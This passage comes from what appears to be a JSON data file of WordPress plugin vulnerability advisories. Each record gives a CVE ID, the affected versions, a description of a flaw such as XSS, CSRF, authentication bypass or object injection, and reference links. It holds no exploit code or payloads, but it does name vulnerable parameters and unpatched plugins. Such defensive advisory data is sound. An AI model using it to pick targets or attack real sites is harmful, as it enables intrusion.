replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a26da53c-4be0-4c9f-9caf-05f054a6d5e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a26da53c-4be0-4c9f-9caf-05f054a6d5e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/styler-for-ninja-forms-lite\\\/tags\\\/3.3.4\\\/admin-menu\\\/licenses.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/styler-for-ninja-forms-lite\\\/tags\\\/3.3.4\\\/admin-menu\\\/licenses.php#L126\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1515","slug":"wp-realestate-manager","versionImpact":"2.8","description":"The WP Real Estate Manager plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.8. This is due to insufficient identity verification on the LinkedIn login request process. This makes it possible for unauthenticated attackers to bypass official authentication and log in as any user on the site, including administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/home-villa-real-estate-wordpress-theme\\\/19446059\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/home-villa-real-estate-wordpress-theme\\\/19446059\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f08111-d116-46f9-9765-28966e338753?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f08111-d116-46f9-9765-28966e338753?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30609","slug":"appexperts","versionImpact":"1.4.3","description":"Insertion of Sensitive Information Into Sent Data vulnerability in AppExperts AppExperts \u2013 WordPress to Mobile App \u2013 WooCommerce to iOs and Android Apps allows Retrieve Embedded Sensitive Data. This issue affects AppExperts \u2013 WordPress to Mobile App \u2013 WooCommerce to iOs and Android Apps: from n\/a through 1.4.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/appexperts\\\/vulnerability\\\/wordpress-appexperts-wordpress-to-mobile-app-woocommerce-to-ios-and-android-apps-1-4-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/appexperts\\\/vulnerability\\\/wordpress-appexperts-wordpress-to-mobile-app-woocommerce-to-ios-and-android-apps-1-4-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32520","slug":"wp-condition","versionImpact":"4.1.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in M. Ali Saleem WordPress Health and Server Condition \u2013 Integrated with Google Page Speed allows Reflected XSS. This issue affects WordPress Health and Server Condition \u2013 Integrated with Google Page Speed: from n\/a through 4.1.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-condition\\\/vulnerability\\\/wordpress-wordpress-health-and-server-condition-plugin-4-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-condition\\\/vulnerability\\\/wordpress-wordpress-health-and-server-condition-plugin-4-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0717","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_delete_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35fb658f-6ffa-4df7-bfcd-25307d89fc26\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35fb658f-6ffa-4df7-bfcd-25307d89fc26\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3459","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.4.1","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hf_update_customer' function called via an AJAX action in versions up to, and including, 2.4.1. This makes it possible for authenticated attackers, with shop manager-level permissions to change user passwords and potentially take over administrator accounts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938705\\\/users-customers-import-export-for-wp-woocommerce#file201\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938705\\\/users-customers-import-export-for-wp-woocommerce#file201\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/tags\\\/2.4.1\\\/admin\\\/modules\\\/user\\\/import\\\/import.php#L446\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/tags\\\/2.4.1\\\/admin\\\/modules\\\/user\\\/import\\\/import.php#L446\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47337214-9cc3-4b12-bb71-9acbab3649b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47337214-9cc3-4b12-bb71-9acbab3649b7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6503","slug":"wp-plugin-lister","versionImpact":"2.1.0","description":"The WP Plugin Lister WordPress plugin through 2.1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d95de23-e8f6-4342-b19c-57cd22b2fee2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d95de23-e8f6-4342-b19c-57cd22b2fee2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6503.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6503.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1335","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the disableOptimization function. This makes it possible for unauthenticated attackers to disable the image optimization setting via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3900e4f-4ae4-4026-89df-b63bd869a763?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3900e4f-4ae4-4026-89df-b63bd869a763?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9445","slug":"display-medium-posts","versionImpact":"5.0.1","description":"The Display Medium Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's display_medium_posts shortcode in all versions up to, and including, 5.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1e0216-d9de-45e9-837c-0cccb78729a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1e0216-d9de-45e9-837c-0cccb78729a6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/display-medium-posts\\\/trunk\\\/display-medium-posts.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/display-medium-posts\\\/trunk\\\/display-medium-posts.php#L200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/display-medium-posts\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/display-medium-posts\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10686","slug":"cf7-styler","versionImpact":"1.6.8","description":"The Design for Contact Form 7 Style WordPress Plugin \u2013 CF7 WOW Styler plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'style_scheme' parameter in all versions up to, and including, 1.6.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e00de7a6-b39f-45c9-8b3e-a554dc6e7944?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e00de7a6-b39f-45c9-8b3e-a554dc6e7944?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-styler\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-styler\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11788","slug":"streamweasels-youtube-integration","versionImpact":"1.3.6","description":"The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sw-youtube-embed' shortcode in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197683%40streamweasels-youtube-integration&new=3197683%40streamweasels-youtube-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197683%40streamweasels-youtube-integration&new=3197683%40streamweasels-youtube-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-youtube-integration\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-youtube-integration\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03c76e61-f263-459f-8618-7565225467e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03c76e61-f263-459f-8618-7565225467e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12545","slug":"scratch-win-giveaways-for-website-facebook","versionImpact":"2.7.1","description":"The Scratch & Win \u2013 Giveaways and Contests. Boost subscribers, traffic, repeat visits,  referrals, sales and more plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.1. This is due to missing nonce validation on the reset_installation() function. This makes it possible for unauthenticated attackers to reset the plugin\u2019s installation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.7.0\\\/includes\\\/swin-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.7.0\\\/includes\\\/swin-api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212730\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212730\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/scratch-win-giveaways-for-website-facebook\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/scratch-win-giveaways-for-website-facebook\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cbc157b-4f1b-4212-9e5c-dd10dd443df7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cbc157b-4f1b-4212-9e5c-dd10dd443df7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0956","slug":"rac","versionImpact":"24.3.0","description":"The WooCommerce Recover Abandoned Cart plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 24.3.0 via deserialization of untrusted input from the 'raccookie_guest_email' cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-recover-abandoned-cart\\\/7715167\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-recover-abandoned-cart\\\/7715167\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/067c974c-b3bb-4f06-8f7c-3963112c40d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/067c974c-b3bb-4f06-8f7c-3963112c40d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30608","slug":"wordpress-sql-backup","versionImpact":"3.5.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Anthony WordPress SQL Backup allows Stored XSS. This issue affects WordPress SQL Backup: from n\/a through 3.5.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-sql-backup\\\/vulnerability\\\/wordpress-wordpress-sql-backup-3-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-sql-backup\\\/vulnerability\\\/wordpress-wordpress-sql-backup-3-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-27291","slug":"photo-image-gallery","versionImpact":"2.0.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in uxgallery WordPress Photo Gallery \u2013 Image Gallery allows Reflected XSS. This issue affects WordPress Photo Gallery \u2013 Image Gallery: from n\/a through 2.0.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/photo-image-gallery\\\/vulnerability\\\/wordpress-photo-gallery-image-gallery-plugin-2-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/photo-image-gallery\\\/vulnerability\\\/wordpress-photo-gallery-image-gallery-plugin-2-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8216","slug":"sky-elementor-addons","versionImpact":"3.1.4","description":"The Sky Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Multiple widgets in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334452\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334452\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sky-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sky-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17240221-01b2-4a21-9e9f-f940280c0fb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17240221-01b2-4a21-9e9f-f940280c0fb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0716","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_edit_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad60a11-e307-4ec9-9099-091a87ff1d3b\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad60a11-e307-4ec9-9099-091a87ff1d3b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3403","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.5.1","description":"The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'pm_upload_csv' function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers, with subscriber-level permissions or above to import new users and update existing users.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b335fc19-2998-4711-8813-6cb68d7447bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b335fc19-2998-4711-8813-6cb68d7447bd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/admin\\\/class-profile-magic-admin.php#L1027\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/admin\\\/class-profile-magic-admin.php#L1027\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6391","slug":"custom-user-css","versionImpact":"0.2","description":"The Custom User CSS WordPress plugin through 0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4098b18d-6ff3-462c-af05-48adb6599cf3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4098b18d-6ff3-462c-af05-48adb6599cf3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6391.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6391.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1334","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the enableOptimization function. This makes it possible for unauthenticated attackers to enable image optimization via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0318ec4a-185a-405d-90f8-008ba373114b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0318ec4a-185a-405d-90f8-008ba373114b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7015","slug":"wp-file-manager-pro","versionImpact":"8.3.4","description":"The File Manager Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tb' parameter in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94750424-bb52-4236-962e-aa8cbdeb1459?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94750424-bb52-4236-962e-aa8cbdeb1459?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/filemanagerpro.io\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/filemanagerpro.io\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9421","slug":"login-logout-shortcode","versionImpact":"1.1.0","description":"The Login Logout Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f7ce513-45ba-427b-8ee0-1007e404c1a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f7ce513-45ba-427b-8ee0-1007e404c1a9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-logout-shortcode\\\/trunk\\\/login-logout-shortcode.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-logout-shortcode\\\/trunk\\\/login-logout-shortcode.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/login-logout-shortcode\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/login-logout-shortcode\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10629","slug":"gpx-viewer","versionImpact":"2.2.8","description":"The GPX Viewer plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check and file type validation in the gpxv_file_upload() function in all versions up to, and including, 2.2.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfc6ff21-52f5-453f-bf97-881c39be1aeb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfc6ff21-52f5-453f-bf97-881c39be1aeb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gpx-viewer\\\/tags\\\/2.2.9\\\/gpx-viewer-admin.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gpx-viewer\\\/tags\\\/2.2.9\\\/gpx-viewer-admin.php#L144\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12047","slug":"wp-compress-image-optimizer","versionImpact":"6.30.03","description":"The WP Compress \u2013 Instant Performance & Speed Optimization plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018custom_server\u2019 parameter in all versions up to, and including, 6.30.03 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a 